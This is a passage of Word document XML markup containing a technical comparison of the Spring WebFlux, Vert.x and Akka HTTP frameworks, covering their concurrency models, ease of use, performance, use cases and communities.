          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> library, which uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle concurrency. It supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (0 or 1 item) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (0 to N items) as abstractions for asynchronous sequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755C0003"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vent-loop model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It uses an event-loop model for handling I/O, ensuring non-blocking, non-blocking operations with a small number of threads for maximum throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657963EE"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Vert.x:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB9094"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ingle-threaded event loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Vert.x uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single-threaded event-loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> per core processor to handle asynchronous I/O operations. Each thread is shared across multiple handlers, and it allows event-driven programming with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking calls</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E665EA"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oncurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Vert.x uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>verticles</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, lightweight event-driven components that run on event loops, and is designed to scale horizontally without blocking threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E0AE6D"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Akka HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2490856F"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Actor-based concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Akka HTTP leverages the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actor model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle concurrency. It has </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actors</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are lightweight entities that interact asynchronously via message passing. Akka actors can run on a few threads, but multiple actors are processed concurrently, achieving high scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575BB449"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Backpressure handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Akka Streams is integrated with Akka HTTP to handle backpressure when consuming streams of data, ensuring resource efficiency even under heavy load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742040DD"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3. Ease of Use and Integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14655127"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pring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE70A2E"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Familiarity for Spring users</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you are already using Spring, Spring WebFlux integrates seamlessly with the rest of the Spring ecosystem, such as Spring Security, Spring Data, Spring Cloud, etc. Spring provides a higher-level abstraction, such as @RestController, making it easier to build REST APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737E4559"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omplexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring WebFlux can be complex to configure, especially when dealing with functional routing and the low-level reactive programming concepts. However, Spring Boot provides an easy way to get started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3761D7"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Vert.x:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB14E58"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Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Vert.x is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lightweight</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and gives you the flexibility to choose how you want to handle routes, services, and interactions. It requires less boilerplate code and is easier to start with compared to Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56176C9F"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Polyglot support</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It has the advantage of supporting multiple languages, which is beneficial for polyglot environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAEE3C1"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Akka HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6454B4"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Actor model complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Akka HTTP is well-suited for applications where concurrency and message-passing are central. However, it requires understanding the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actor model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which might be difficult for developers without prior experience in distributed systems or concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27126551"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Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It integrates well with the broader Akka toolkit (such as Akka Streams and Akka Cluster) but might feel heavier for simple use cases compared to Spring WebFlux or Vert.x.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C5ABCC"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4. Performance and Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455C5CA5"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pring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035AEDE0"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lastRenderedPageBreak/>
        <w:t>Reactive Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring WebFlux is highly scalable when built with non-blocking I/O using Netty or Undertow. It is suitable for building applications with high concurrency or real-time applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52646C3C"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source utilization</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The framework handles many concurrent requests with minimal resources because of its non-blocking I/O model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71992D09"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Vert.x:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C619A0C"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tremely high concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Vert.x is known for its </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exceptional performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can handle hundreds of thousands of concurrent connections with minimal resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675F87DD"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vent-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Its event-driven, non-blocking model is extremely efficient in handling high-throughput, I/O-bound applications. Vert.x can scale horizontally with ease.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EC0A64"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Akka HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385787C1"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Highly scalable</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Akka HTTP is designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high concurrency and scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It uses Akka Streams for backpressure handling and can scale effectively for streaming applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FFC065"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Distributed systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: With Akka's </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cluster</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> capabilities, Akka HTTP can handle distributed and highly concurrent systems across multiple nodes, which is ideal for building microservices in complex distributed environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E84AEE5"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5. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0336569F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5B38E"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deal for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>building web applications</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RESTful APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a reactive programming model. Suitable for applications that require integration with the Spring ecosystem and need to handle high concurrency or real-time communication, such as social media apps, IoT backends, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE6255B"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Vert.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7133EB92"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Best for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high-performance, event-driven applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a focus on concurrency and low-latency. Suitable for microservices, real-time data processing, chat apps, or systems that need to handle large-scale concurrent I/O operations, like gaming backends or event streaming platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE1463C"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Akka HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305051ED"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deal for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed, event-driven applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that require high scalability, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message-based systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or microservices that need to deal with high-throughput and resource-efficient communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1463BAC1"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6. Community and Ecosystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510046CB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A8BAEE"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Mature</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>large community</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> support, especially among Java developers. Well-integrated into the broader </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring ecosystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Spring Boot, Spring Security, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E18067D"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Vert.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABDD4EF"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trong community</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growing popularity</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It is gaining traction, especially for lightweight, microservices-style applications. Its polyglot nature makes it popular among developers from different programming language backgrounds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9EA17A"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Akka HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A59832"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trong community</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enterprise adoption</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, especially in systems that require distributed, actor-based architectures. Akka has a mature ecosystem around </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
